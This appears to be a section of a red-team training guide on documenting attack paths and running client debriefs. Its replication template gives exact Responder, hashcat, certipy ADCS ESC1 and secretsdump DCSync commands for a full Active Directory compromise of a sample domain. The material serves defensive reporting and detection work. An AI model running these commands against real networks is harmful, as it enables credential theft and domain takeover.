8.5 Attack Path Documentation

What you're building: A clear, reproducible visual attack path that a blue team can follow step-by-step to replay the engagement in their SIEM, validate detections, and understand exactly where controls failed.

Produce clear, reproducible attack path diagrams that show the full kill chain from initial access to objective.

Technique: Visual Kill Chain Mapping

Tools/Templates: Mermaid, draw.io, BloodHound

Procedure:

graph LR
    A([Initial Access: Phishing — WS-01]) --> B[Enumeration: BloodHound collection]
    B --> C[Credential Access: LLMNR poisoning → svc-backup hash]
    C --> D[Lateral Movement: RDP to FILE-01 — svc-backup]
    D --> E[Escalation: ADCS ESC1 → Admin TGT via PKINIT]
    E --> F([Objective: DCSync — full AD compromise])
    style A fill:#ff6600
    style F fill:#ff0000

Step-by-Step Replication Template

1. Step 1: Initial Access

   • Technique: Simulated phishing (LNK file)
   • Command: (simulate initial access via agreed method)
   • Output: RDP session established as contoso\jsmith on WS-01 (10.0.1.50)
   • Note: No EDR alert generated

2. Step 2: Credential Access — LLMNR Poisoning

   • Technique: LLMNR/NBT-NS poisoning (T1557.001)
   • Command: responder -I eth0 -dwv
   • Output: [*] NTLMv2 hash captured: svc-backup::CONTOSO:...
   • Command: hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
   • Output: svc-backup:Password1! (cracked in 8 seconds)

3. Step 3: Lateral Movement

   • Technique: Valid Accounts — Lateral Movement (T1078)
   • Command: xfreerdp /u:svc-backup /p:Password1! /v:FILE-01.contoso.com
   • Output: RDP session on FILE-01 (10.0.1.20)

4. Step 4: Privilege Escalation — ADCS ESC1

   • Technique: Steal or Forge Authentication Certificates (T1649)
   • Command: certipy req -u svc-backup@contoso.com -p Password1! -template VulnerableTemplate -ca Contoso-CA -upn administrator@contoso.com
   • Output: administrator.pfx — certificate for Administrator

5. Step 5: Objective — DCSync

   • Technique: OS Credential Dumping: DCSync (T1003.006)
   • Command: certipy auth -pfx administrator.pfx -dc-ip 10.0.0.5 then secretsdump.py -k -no-pass contoso.com
   • Output: All NTLM hashes for 847 domain accounts

Choke Point Identification

• Choke Point 1: LLMNR enabled network-wide. Disabling eliminates this entire credential access path.
• Choke Point 2: ADCS template misconfiguration. Fixing the template removes the privilege escalation path.
• Choke Point 3: No detection at any step. Deploying MDI and endpoint detection would alert on PKINIT anomalies and BloodHound collection.

NOTE: A blue team should be able to replay your entire attack path using only this section. Every command should be exact and every output should be real (sanitize sensitive data, don't fabricate it).

Engagement Debrief Structure

What you're building: A structured debrief process that ensures findings actually get actioned — the written report is reference material, but the debrief is where security posture actually changes.

The written report is what the client keeps. The debrief is what they act on. Two separate sessions, two separate audiences.

Executive Debrief (30 minutes — CISO, CTO, Board representative)

1. Scope Reminder (2 min): What was tested, what was not in scope
2. Overall Risk Posture (5 min): One clear verdict — Critical/High/Medium
3. Top 3 Findings (10 min): Business consequence language only — no acronyms, no CVE numbers
4. Crown Jewel Status (5 min): Were the agreed-upon crown jewels reached? How long did it take?
5. 90-Day Roadmap (8 min): Three prioritized, budgeted remediation tracks

Technical Debrief (60–90 minutes — Security team, IT leads, developers)

1. Full Attack Path Walkthrough (20 min): Live replay in SIEM or screen share of terminal output
2. Detection Gap Analysis (15 min): What fired? What should have fired but didn't? Why?
3. Finding Deep-Dive (30 min): Each finding — technical explanation, reproduction steps, fix guidance
4. Purple Team Recommendations (10 min): Specific detection rules or queries the blue team should add
5. Q&A (open): Leave time for the technical team to ask questions about techniques

Why: The written report is a reference document — clients file it and return to it when budgeting or planning. The debrief is where learning happens. A skilled red teamer who can explain their techniques clearly in a debrief is worth 2x a technician who only writes.

Part of Pillar 8: Reporting & Portfolio Development.